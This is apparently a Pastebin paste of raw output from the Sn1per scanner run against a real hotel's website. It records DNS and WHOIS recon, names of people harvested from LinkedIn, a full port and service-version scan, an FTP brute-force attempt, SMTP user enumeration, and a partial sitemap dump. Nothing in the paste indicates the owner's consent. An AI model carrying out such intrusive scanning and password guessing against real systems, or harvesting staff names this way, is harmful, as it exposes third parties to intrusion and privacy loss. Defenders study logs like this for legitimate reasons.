SHARE
TWEET

tets Sniper - Backtrack-Omar

a guest Sep 29th, 2015 802 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. root@kali:~/Sn1per-master# ./sniper
  2.                 ____              
  3.     _________  /  _/___  ___  _____
  4.    / ___/ __ \ / // __ \/ _ \/ ___/
  5.   (__  ) / / // // /_/ /  __/ /    
  6.  /____/_/ /_/___/ .___/\___/_/    
  7.                /_/                
  8.  
  9.  + -- --=[http://crowdshield.com
  10.  + -- --=[sn1per v1.3 by 1N3
  11.  + -- --=[Usage: sn1per <target>
  12. root@kali:~/Sn1per-master# clear
  13. 
  14.  
  15.  
  16. root@kali:~/Sn1per-master# ./sniper www.lasdunashotel.com
  17. 
  18.  
  19.  
  20.                 ____              
  21.     _________  /  _/___  ___  _____
  22.    / ___/ __ \ / // __ \/ _ \/ ___/
  23.   (__  ) / / // // /_/ /  __/ /    
  24.  /____/_/ /_/___/ .___/\___/_/    
  25.                /_/                              
  26.  
  27.  + -- --=[http://crowdshield.com
  28.  + -- --=[sn1per v1.3 by 1N3
  29.  
  30. ################################### Running recon #################################
  31. Server:         192.168.179.2
  32. Address:        192.168.179.2#53
  33.  
  34. Non-authoritative answer:
  35. www.lasdunashotel.com   canonical name = lasdunashotel.com.
  36. Name:   lasdunashotel.com
  37. Address: 192.185.26.214
  38.  
  39. www.lasdunashotel.com is an alias for lasdunashotel.com.
  40. lasdunashotel.com has address 192.185.26.214
  41. lasdunashotel.com mail is handled by 0 lasdunashotel.com.
  42.  
  43. ; <<>> DiG 9.9.5-9+deb8u3-Debian <<>> -x www.lasdunashotel.com
  44. ;; global options: +cmd
  45. ;; Got answer:
  46. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 18269
  47. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  48.  
  49. ;; OPT PSEUDOSECTION:
  50. ; EDNS: version: 0, flags:; MBZ: 0005 , udp: 4000
  51. ;; QUESTION SECTION:
  52. ;com.lasdunashotel.www.in-addr.arpa. IN PTR
  53.  
  54. ;; AUTHORITY SECTION:
  55. in-addr.arpa.           5       IN      SOA     b.in-addr-servers.arpa. nstld.iana.org. 2015072210 1800 900 604800 3600
  56.  
  57. ;; Query time: 162 msec
  58. ;; SERVER: 192.168.179.2#53(192.168.179.2)
  59. ;; WHEN: Tue Sep 29 12:04:56 EDT 2015
  60. ;; MSG SIZE  rcvd: 131
  61.  
  62.  
  63. Whois Server Version 2.0
  64.  
  65. Domain names in the .com and .net domains can now be registered
  66. with many different competing registrars. Go to http://www.internic.net
  67. for detailed information.
  68.  
  69. No match for "WWW.LASDUNASHOTEL.COM".
  70. >>> Last update of whois database: Tue, 29 Sep 2015 16:04:44 GMT <<<
  71.  
  72. NOTICE: The expiration date displayed in this record is the date the
  73. registrar's sponsorship of the domain name registration in the registry is
  74. currently set to expire. This date does not necessarily reflect the expiration
  75. date of the domain name registrant's agreement with the sponsoring
  76. registrar.  Users may consult the sponsoring registrar's Whois database to
  77. view the registrar's reported date of expiration for this registration.
  78.  
  79. TERMS OF USE: You are not authorized to access or query our Whois
  80. database through the use of electronic processes that are high-volume and
  81. automated except as reasonably necessary to register domain names or
  82. modify existing registrations; the Data in VeriSign Global Registry
  83. Services' ("VeriSign") Whois database is provided by VeriSign for
  84. information purposes only, and to assist persons in obtaining information
  85. about or related to a domain name registration record. VeriSign does not
  86. guarantee its accuracy. By submitting a Whois query, you agree to abide
  87. by the following terms of use: You agree that you may use this Data only
  88. for lawful purposes and that under no circumstances will you use this Data
  89. to: (1) allow, enable, or otherwise support the transmission of mass
  90. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  91. or facsimile; or (2) enable high volume, automated, electronic processes
  92. that apply to VeriSign (or its computer systems). The compilation,
  93. repackaging, dissemination or other use of this Data is expressly
  94. prohibited without the prior written consent of VeriSign. You agree not to
  95. use electronic processes that are automated and high-volume to access or
  96. query the Whois database except as reasonably necessary to register
  97. domain names or modify existing registrations. VeriSign reserves the right
  98. to restrict your access to the Whois database in its sole discretion to ensure
  99. operational stability.  VeriSign may restrict or terminate your access to the
  100. Whois database for failure to abide by these terms of use. VeriSign
  101. reserves the right to modify these terms at any time.
  102.  
  103. The Registry database contains ONLY .COM, .NET, .EDU domains and
  104. Registrars.
  105.  
  106. For more information on Whois status codes, please visit
  107. https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
  108.  
  109. *******************************************************************
  110. *                                                                 *
  111. * | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *
  112. * | __| '_ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  113. * | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *
  114. *  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *
  115. *                                                                 *
  116. * TheHarvester Ver. 2.6                                           *
  117. * Coded by Christian Martorella                                   *
  118. * Edge-Security Research                                          *
  119. * cmartorella@edge-security.com                                   *
  120. *******************************************************************
  121.  
  122.  
  123. [-] Searching in Google:
  124.         Searching 0 results...
  125.         Searching 100 results...
  126.  
  127.  
  128. [+] Emails found:
  129. ------------------
  130. No emails found
  131.  
  132. [+] Hosts found in search engines:
  133. ------------------------------------
  134. No hosts found
  135.  
  136. *******************************************************************
  137. *                                                                 *
  138. * | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *
  139. * | __| '_ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  140. * | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *
  141. *  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *
  142. *                                                                 *
  143. * TheHarvester Ver. 2.6                                           *
  144. * Coded by Christian Martorella                                   *
  145. * Edge-Security Research                                          *
  146. * cmartorella@edge-security.com                                   *
  147. *******************************************************************
  148.  
  149.  
  150. [-] Searching in Bing:
  151.         Searching 50 results...
  152.         Searching 100 results...
  153.  
  154.  
  155. [+] Emails found:
  156. ------------------
  157. @www.lasdunashotel.com
  158.  
  159. [+] Hosts found in search engines:
  160. ------------------------------------
  161. No hosts found
  162.  
  163. *******************************************************************
  164. *                                                                 *
  165. * | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *
  166. * | __| '_ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  167. * | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *
  168. *  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *
  169. *                                                                 *
  170. * TheHarvester Ver. 2.6                                           *
  171. * Coded by Christian Martorella                                   *
  172. * Edge-Security Research                                          *
  173. * cmartorella@edge-security.com                                   *
  174. *******************************************************************
  175.  
  176.  
  177. [-] Searching in Linkedin..
  178.         Searching 100 results..
  179. Users from Linkedin:
  180. ====================
  181. Israel Junior Martinez Alvarez
  182. Virginia De Miguel
  183. Barry Ivan WHITE
  184. Luisa Kiss
  185.  
  186. *******************************************************************
  187. *                                                                 *
  188. * | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *
  189. * | __| '_ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  190. * | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *
  191. *  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *
  192. *                                                                 *
  193. * TheHarvester Ver. 2.6                                           *
  194. * Coded by Christian Martorella                                   *
  195. * Edge-Security Research                                          *
  196. * cmartorella@edge-security.com                                   *
  197. *******************************************************************
  198.  
  199.  
  200. [-] Searching in 123People..
  201.         Searching 0 results...
  202.         Searching 100 results...
  203. Users from 123People:
  204. =====================
  205.  
  206.  
  207. [+] Emails found:
  208. ------------------
  209. No emails found
  210.  
  211. [+] Hosts found in search engines:
  212. ------------------------------------
  213. dnsenum.pl VERSION:1.2.3
  214.  
  215. -----   www.lasdunashotel.com   -----
  216.  
  217.  
  218. Host's addresses:
  219. __________________
  220.  
  221. lasdunashotel.com.                       5        IN    A        192.185.26.214
  222.  
  223.  
  224. Name Servers:
  225. ______________
  226.  
  227. ns838.websitewelcome.com.                5        IN    A        192.185.26.188
  228. ns837.websitewelcome.com.                5        IN    A        192.185.26.183
  229.  
  230.  
  231. Mail (MX) Servers:
  232. ___________________
  233.  
  234. lasdunashotel.com.                       5        IN    A        192.185.26.214
  235.  
  236.  
  237. Trying Zone Transfers and getting Bind Versions:
  238. _________________________________________________
  239.  
  240.  
  241. Trying Zone Transfer for www.lasdunashotel.com on ns837.websitewelcome.com ...
  242. AXFR record query failed: timeout
  243.  
  244. Trying Zone Transfer for www.lasdunashotel.com on ns838.websitewelcome.com ...
  245. AXFR record query failed: timeout
  246.  
  247. brute force file not specified, bay.
  248. ./sniper: línea 78: bin/dnsdict6: Permiso denegado
  249.  
  250. + -- --=[Checking for SPF records on www.lasdunashotel.com...
  251.  
  252. ################################### Pinging host ###################################
  253. PING lasdunashotel.com (192.185.26.214) 56(84) bytes of data.
  254. 64 bytes from 192-185-26-214.unifiedlayer.com (192.185.26.214): icmp_seq=1 ttl=128 time=267 ms
  255.  
  256. --- lasdunashotel.com ping statistics ---
  257. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  258. rtt min/avg/max/mdev = 267.345/267.345/267.345/0.000 ms
  259.  
  260. ################################### Running port scan ##############################
  261.  
  262. Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:05 EDT
  263. Warning: 192.185.26.214 giving up on port because retransmission cap hit (6).
  264. Nmap scan report for www.lasdunashotel.com (192.185.26.214)
  265. Host is up (0.091s latency).
  266. rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
  267. Not shown: 972 closed ports, 11 filtered ports
  268. PORT     STATE SERVICE    VERSION
  269. 21/tcp   open  ftp        Pure-FTPd
  270. 25/tcp   open  smtp       Exim smtpd 4.85
  271. |_smtp-commands: SMTP EHLO www.lasdunashotel.com: failed to receive data: connection closed
  272. 26/tcp   open  smtp       Exim smtpd 4.85
  273. |_smtp-commands: Couldn't establish connection on port 26
  274. |_ssl-date: 2015-09-29T16:14:13+00:00; -3s from scanner time.
  275. 53/tcp   open  domain?
  276. 80/tcp   open  http       nginx 1.8.0
  277. |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
  278. |_http-server-header: nginx/1.8.0
  279. |_http-title: Hoteles en Ica Peru Las Dunas Hotel & Resort
  280. 110/tcp  open  pop3       Dovecot pop3d
  281. |_pop3-capabilities: AUTH-RESP-CODE RESP-CODES TOP PIPELINING SASL(PLAIN LOGIN) STLS CAPA USER UIDL
  282. | ssl-cert: Subject: commonName=*.websitewelcome.com
  283. | Not valid before: 2015-01-05T00:00:00
  284. |_Not valid after:  2018-01-04T23:59:59
  285. |_ssl-date: TLS randomness does not represent time
  286. 119/tcp  open  nntp?
  287. 143/tcp  open  imap       Dovecot imapd
  288. |_imap-capabilities: OK AUTH=PLAIN listed LOGIN-REFERRALS AUTH=LOGINA0001 Pre-login more IDLE have capabilities IMAP4rev1 ID LITERAL+ post-login ENABLE SASL-IR NAMESPACE STARTTLS
  289. | ssl-cert: Subject: commonName=*.websitewelcome.com
  290. | Not valid before: 2015-01-05T00:00:00
  291. |_Not valid after:  2018-01-04T23:59:59
  292. |_ssl-date: TLS randomness does not represent time
  293. 443/tcp  open  ssl/ssl    Apache httpd (SSL-only mode)
  294. | http-cisco-anyconnect:
  295. |_  ERROR: Not a Cisco ASA or unsupported version
  296. |_http-methods: No Allow or Public header in OPTIONS response (status code 302)
  297. |_http-server-header: Apache
  298. | http-title: 404 - PAGE NOT FOUND
  299. |_Requested resource was /404.html
  300. | ssl-cert: Subject: commonName=*.websitewelcome.com
  301. | Not valid before: 2015-01-05T00:00:00
  302. |_Not valid after:  2018-01-04T23:59:59
  303. |_ssl-date: 2015-09-29T16:14:19+00:00; -3s from scanner time.
  304. 465/tcp  open  ssl/smtp   Exim smtpd 4.85
  305. |_smtp-commands: Couldn't establish connection on port 465
  306. 563/tcp  open  tcpwrapped
  307. 587/tcp  open  smtp       Exim smtpd 4.85
  308. |_smtp-commands: SMTP EHLO www.lasdunashotel.com: failed to receive data: connection closed
  309. |_ssl-date: TLS randomness does not represent time
  310. 993/tcp  open  ssl/imap   Dovecot imapd
  311. | imap-capabilities:
  312. |_  ERROR: Failed to connect to server
  313. | ssl-cert: Subject: commonName=*.websitewelcome.com
  314. | Not valid before: 2015-01-05T00:00:00
  315. |_Not valid after:  2018-01-04T23:59:59
  316. |_ssl-date: TLS randomness does not represent time
  317. 995/tcp  open  ssl/pop3   Dovecot pop3d
  318. |_pop3-capabilities: SASL(PLAIN LOGIN) UIDL PIPELINING TOP USER CAPA AUTH-RESP-CODE RESP-CODES
  319. | ssl-cert: Subject: commonName=*.websitewelcome.com
  320. | Not valid before: 2015-01-05T00:00:00
  321. |_Not valid after:  2018-01-04T23:59:59
  322. |_ssl-date: TLS randomness does not represent time
  323. 2222/tcp open  ssh        OpenSSH 5.3 (protocol 2.0)
  324. 3306/tcp open  mysql      MySQL 5.5.42-37.1
  325. | mysql-info:
  326. |   Protocol: 53
  327. |   Version: .5.42-37.1
  328. |   Thread ID: 17268187
  329. |   Capabilities flags: 65535
  330. |   Some Capabilities: InteractiveClient, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsLoadDataLocal, SupportsCompression, Speaks41ProtocolOld, ConnectWithDatabase, SupportsTransactions, LongColumnFlag, LongPassword, IgnoreSigpipes, ODBCClient, DontAllowDatabaseTableColumn, SwitchToSSLAfterHandshake
  331. |   Status: Autocommit
  332. |_  Salt: ;LM{G/S4JXY:RnS6Ry+f
  333. 8080/tcp open  http       nginx 1.8.0
  334. |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
  335. |_http-server-header: nginx/1.8.0
  336. |_http-title: Hoteles en Ica Peru Las Dunas Hotel & Resort
  337. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  338. SF-Port119-TCP:V=6.49BETA4%I=7%D=9/29%Time=560AB833%P=i586-pc-linux-gnu%r(
  339. SF:NULL,5C,"400\x20Cannot\x20connect\x20to\x20NNTP\x20server\x20192\.185\.
  340. SF:26\.214\x20\(192\.185\.26\.214:119\),\x20connect\x20error\x2010061\r\n"
  341. SF:);
  342. Device type: WAP|general purpose|storage-misc
  343. Running (JUST GUESSING): Actiontec Linux (95%), Linux 2.4.X|3.X (94%), Microsoft Windows 7|2012|XP (92%), BlueArc embedded (87%)
  344. OS CPE: cpe:/o:actiontec:linux_kernel cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_xp::sp3 cpe:/h:bluearc:titan_2100
  345. Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (95%), DD-WRT v24-sp2 (Linux 2.4.37) (94%), Linux 3.2 (93%), Microsoft Windows 7 or Windows Server 2012 (92%), Microsoft Windows XP SP3 (92%), BlueArc Titan 2100 NAS device (87%)
  346. No exact OS matches for host (test conditions non-ideal).
  347. Network Distance: 2 hops
  348. Service Info: Host: canto.websitewelcome.com
  349.  
  350. TRACEROUTE (using port 80/tcp)
  351. HOP RTT     ADDRESS
  352. 1   0.10 ms 192.168.179.2
  353. 2   0.10 ms 192-185-26-214.unifiedlayer.com (192.185.26.214)
  354.  
  355. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  356. Nmap done: 1 IP address (1 host up) scanned in 537.35 seconds
  357.  
  358. ################################### Running Intrusive Scans ########################
  359. + -- --=[Port 21 opened... running tests...
  360.  
  361. Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:14 EDT
  362. Nmap scan report for www.lasdunashotel.com (192.185.26.214)
  363. Host is up (0.023s latency).
  364. rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
  365. PORT   STATE SERVICE VERSION
  366. 21/tcp open  ftp     Pure-FTPd
  367. | ftp-brute:
  368. |   Accounts: No valid accounts found
  369. |   Statistics: Performed 27 guesses in 59 seconds, average tps: 0
  370. |_  ERROR: Too many retries, aborted ...
  371.  
  372. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  373. Nmap done: 1 IP address (1 host up) scanned in 63.03 seconds
  374. + -- --=[Port 22 closed... skipping.
  375. + -- --=[Port 23 closed... skipping.
  376. + -- --=[Port 25 opened... running tests...
  377.  
  378. Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:15 EDT
  379. Nmap scan report for 192.168.1.113
  380. Host is up (0.00057s latency).
  381. PORT   STATE SERVICE VERSION
  382. 25/tcp open  smtp?
  383. | smtp-brute:
  384. |_  ERROR: Failed to connect to SMTP server
  385. |_smtp-commands: Couldn't establish connection on port 25
  386. | smtp-enum-users:
  387. |_  Couldn't establish connection on port 25
  388. |_smtp-open-relay: Couldn't establish connection on port 25
  389.  
  390. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  391. Nmap done: 1 IP address (1 host up) scanned in 176.47 seconds
  392. Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
  393.  
  394.  ----------------------------------------------------------
  395. |                   Scan Information                       |
  396.  ----------------------------------------------------------
  397.  
  398. Mode ..................... VRFY
  399. Worker Processes ......... 5
  400. Usernames file ........... BruteX/simple-users.txt
  401. Target count ............. 1
  402. Username count ........... 58
  403. Target TCP port .......... 25
  404. Query timeout ............ 5 secs
  405. Target domain ............
  406.  
  407. ######## Scan started at Tue Sep 29 12:18:44 2015 #########
  408.  existsdunashotel.com: anonymous
  409.  existsdunashotel.com: admin
  410.  existsdunashotel.com: bee
  411.  existsdunashotel.com: administrator
  412.  existsdunashotel.com: administration
  413.  existsdunashotel.com: apache
  414. ######## Scan completed at Tue Sep 29 12:19:14 2015 #########
  415. 6 results.
  416.  
  417. 58 queries in 30 seconds (1.9 queries / sec)
  418. + -- --=[Port 53 opened... running tests...
  419.  
  420. Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:19 EDT
  421. Nmap scan report for 192.168.1.113
  422. Host is up (0.00073s latency).
  423. PORT   STATE SERVICE VERSION
  424. 25/tcp open  smtp?
  425.  
  426. Host script results:
  427. |_dns-brute: Can't guess domain of "192.168.1.113"; use dns-brute.domain script argument.
  428.  
  429. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  430. Nmap done: 1 IP address (1 host up) scanned in 152.33 seconds
  431. + -- --=[Port 80 opened... running tests...
  432.  
  433. Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:23 EDT
  434. Failed to resolve "www.lasdunashotel.com".
  435. WARNING: No targets were specified, so 0 hosts scanned.
  436. Nmap done: 0 IP addresses (0 hosts up) scanned in 2.45 seconds
  437.  
  438.                                  ^     ^
  439.         _   __  _   ____ _   __  _    _   ____
  440.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  441.       | V V // o // _/ | V V // 0 // 0 // _/  
  442.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/    
  443.                                 <  
  444.                                  ...'
  445.                                  
  446.     WAFW00F - Web Application Firewall Detection Tool
  447.    
  448.     By Sandro Gauci && Wendel G. Henrique
  449.  
  450. Checking http://www.lasdunashotel.com
  451. ERROR:root:Site http://www.lasdunashotel.com appears to be down
  452.  
  453. http://www.lasdunashotel.com [200] Country[UNITED STATES][US], HTTPServer[nginx/1.8.0], IP[192.185.26.214], nginx[1.8.0]
  454. ./sniper: línea 179: xsstracer: no se encontró la orden
  455.  
  456. + -- --=[Checking if X-Content options are enabled on www.lasdunashotel.com...
  457.  
  458. + -- --=[Checking if X-Frame options are enabled on www.lasdunashotel.com...
  459.  
  460. + -- --=[Checking if X-XSS-Protection header is enabled on www.lasdunashotel.com...
  461.  
  462. + -- --=[Checking HTTP methods on www.lasdunashotel.com...
  463.  
  464. + -- --=[Checking if TRACE method is enabled on www.lasdunashotel.com...
  465.  
  466. + -- --=[Checking for open proxy on www.lasdunashotel.com...
  467. <html>
  468. <head>
  469. <meta name="robots" content="noarchive" />
  470. <meta name="googlebot" content="nosnippet" />
  471. </head>
  472. <body>
  473. <div align=center>
  474. <h3>Error. Page cannot be displayed. Please contact your service provider for more details.  (1)</h3>
  475. </div>
  476. </body>
  477. </html>
  478. + -- --=[Enumerating software on www.lasdunashotel.com...
  479. Server: nginx/1.8.0
  480.  
  481. + -- --=[Checking if Strict-Transport-Security is enabled on www.lasdunashotel.com...
  482.  
  483. + -- --=[Checking for Flash cross-domain policy on www.lasdunashotel.com...
  484. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  485. <html><head>
  486. <title>302 Found</title>
  487. </head><body>
  488. <h1>Found</h1>
  489. <p>The document has moved <a href="http://www.lasdunashotel.com/index.php">here</a>.</p>
  490. <hr>
  491. <address>Apache Server at www.lasdunashotel.com Port 80</address>
  492. </body></html>
  493.  
  494. + -- --=[Checking for Silverlight cross-domain policy on www.lasdunashotel.com...
  495. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  496. <html><head>
  497. <title>302 Found</title>
  498. </head><body>
  499. <h1>Found</h1>
  500. <p>The document has moved <a href="http://www.lasdunashotel.com/index.php">here</a>.</p>
  501. <hr>
  502. <address>Apache Server at www.lasdunashotel.com Port 80</address>
  503. </body></html>
  504.  
  505. + -- --=[Checking for HTML5 cross-origin resource sharing on www.lasdunashotel.com...
  506.  
  507. + -- --=[Retrieving robots.txt on www.lasdunashotel.com...
  508. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  509. <html><head>
  510. <title>302 Found</title>
  511. </head><body>
  512. <h1>Found</h1>
  513. <p>The document has moved <a href="http://www.lasdunashotel.com/index.php">here</a>.</p>
  514. <hr>
  515. <address>Apache Server at www.lasdunashotel.com Port 80</address>
  516. </body></html>
  517.  
  518. + -- --=[Retrieving sitemap.xml on www.lasdunashotel.com...
  519. <?xml version="1.0" encoding="UTF-8"?>
  520. <urlset
  521.       xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
  522.       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  523.       xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
  524.             http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
  525. <!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->
  526.  
  527. <url>
  528.   <loc>http://lasdunashotel.com/</loc>
  529.   <changefreq>always</changefreq>
  530. </url>
  531. <url>
  532.   <loc>http://lasdunashotel.com/quienes_somos.php</loc>
  533.   <changefreq>always</changefreq>
  534. </url>
  535. <url>
  536.   <loc>http://lasdunashotel.com/habitaciones.php</loc>
  537.   <changefreq>always</changefreq>
  538. </url>
  539. <url>
  540.   <loc>http://lasdunashotel.com/servicios.php</loc>
  541.   <changefreq>always</changefreq>
  542. </url>
  543. <url>
  544.   <loc>http://lasdunashotel.com/paquetes.php</loc>
  545.   <changefreq>always</changefreq>
  546. </url>
  547. <url>
  548.   <loc>http://lasdunashotel.com/eventos.php</loc>
  549.   <changefreq>always</changefreq>
  550. </url>
  551. <url>
  552.   <loc>http://lasdunashotel.com/galeria.php</loc>
  553.   <changefreq>always</changefreq>
  554. </url>
  555. <url>
  556.   <loc>http://lasdunashotel.com/informacion.php</loc>
  557.   <changefreq>always</changefreq>
  558. </url>
  559. <url>
  560.   <loc>http://lasdunashotel.com/contactenos.php</loc>
  561.   <changefreq>always</changefreq>
  562. </url>
  563. <url>
  564.   <loc>http://lasdunashotel.com/banner-no-perder.php</loc>
  565.   <changefreq>always</changefreq>
  566. </url>
  567. <url>
  568.   <loc>http://lasdunashotel.com/recomienda.php</loc>
  569.   <changefreq>always</changefreq>
  570. </url>
  571. <url>
  572.   <loc>http://lasdunashotel.com/en/</loc>
  573.   <changefreq>always</changefreq>
  574. </url>
  575. <url>
  576.   <loc>http://lasdunashotel.com/registrese.php</loc>
  577.   <changefreq>always</changefreq>
  578. </url>
  579. <url>
  580.   <loc>http://lasdunashotel.com/index.php</loc>
  581.   <changefreq>always</changefreq>
  582. </url>
  583. <url>
  584.   <loc>http://lasdunashotel.com/banner-full-day.php</loc>
  585.   <changefreq>always</changefreq>
  586. </url>
  587. <url>
  588.   <loc>http://lasdunashotel.com/ubicacion.php</loc>
  589.   <changefreq>always</changefreq>
  590. </url>
  591. <url>
  592.   <loc>http://lasdunashotel.com/responsabilidad-social.php</loc>
  593.   <changefreq>always</changefreq>
  594. </url>
  595. <url>
  596.   <loc>http://lasdunashotel.com/sitemap.php</loc>
  597.   <changefreq>always</changefreq>
  598. </url>
  599. <url>
  600.   <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=1</loc>
  601.   <changefreq>always</changefreq>
  602. </url>
  603. <url>
  604.   <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=2</loc>
  605.   <changefreq>always</changefreq>
  606. </url>
  607. <url>
  608.   <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=3</loc>
  609.   <changefreq>always</changefreq>
  610. </url>
  611. <url>
  612.   <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=4</loc>
  613.   <changefreq>always</changefreq>
  614. </url>
  615. <url>
  616.   <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=5</loc>
  617.   <changefreq>always</changefreq>
  618. </url>
  619. <url>
  620.   <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=6</loc>
  621.   <changefreq>always</changefreq>
  622. </url>
  623. <url>
  624.   <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=7</loc>
  625.   <changefreq>always</changefreq>
  626. </url>
  627. <url>
  628.   <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=8</loc>
  629.   <changefreq>always</changefreq>
  630. </url>
  631. <url>
  632.   <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=9</loc>
  633.   <changefreq>always</changefreq>
  634. </url>
  635. <url>
  636.   <loc>http://lasdunashotel.com/compara.php?pk_habitacion=1</loc>
  637.   <changefreq>always</changefreq>
  638. </url>
  639. <url>
  640.   <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=1</loc>
  641.   <changefreq>always</changefreq>
  642. </url>
  643. <url>
  644.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=27</loc>
  645.   <changefreq>always</changefreq>
  646. </url>
  647. <url>
  648.   <loc>http://lasdunashotel.com/tarifas.php</loc>
  649.   <changefreq>always</changefreq>
  650. </url>
  651. <url>
  652.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=2</loc>
  653.   <changefreq>always</changefreq>
  654. </url>
  655. <url>
  656.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=3</loc>
  657.   <changefreq>always</changefreq>
  658. </url>
  659. <url>
  660.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=4</loc>
  661.   <changefreq>always</changefreq>
  662. </url>
  663. <url>
  664.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=5</loc>
  665.   <changefreq>always</changefreq>
  666. </url>
  667. <url>
  668.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=6</loc>
  669.   <changefreq>always</changefreq>
  670. </url>
  671. <url>
  672.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=7</loc>
  673.   <changefreq>always</changefreq>
  674. </url>
  675. <url>
  676.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=8</loc>
  677.   <changefreq>always</changefreq>
  678. </url>
  679. <url>
  680.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=11</loc>
  681.   <changefreq>always</changefreq>
  682. </url>
  683. <url>
  684.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=12</loc>
  685.   <changefreq>always</changefreq>
  686. </url>
  687. <url>
  688.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=13</loc>
  689.   <changefreq>always</changefreq>
  690. </url>
  691. <url>
  692.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=14</loc>
  693.   <changefreq>always</changefreq>
  694. </url>
  695. <url>
  696.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=17</loc>
  697.   <changefreq>always</changefreq>
  698. </url>
  699. <url>
  700.   <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=18</loc>
  701.   <changefreq>always</changefreq>
  702. </url>
  703. <url>
  704.   <loc>http://lasdunashotel.com/paquetes-request.php</loc>
  705.   <changefreq>always</changefreq>
  706. </url>
  707. <url>
  708.   <loc>http://lasdunashotel.com/eventos-salones.php</loc>
  709.   <changefreq>always</changefreq>
  710. </url>
  711. <url>
  712.   <loc>http://lasdunashotel.com/eventos-programas.php</loc>
  713.   <changefreq>always</changefreq>
  714. </url>
  715. <url>
  716.   <loc>http://lasdunashotel.com/cuestionario.php</loc>
  717.   <changefreq>always</changefreq>
  718. </url>
  719. <url>
  720.   <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=3</loc>
  721.   <changefreq>always</changefreq>
  722. </url>
  723. <url>
  724.   <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=4</loc>
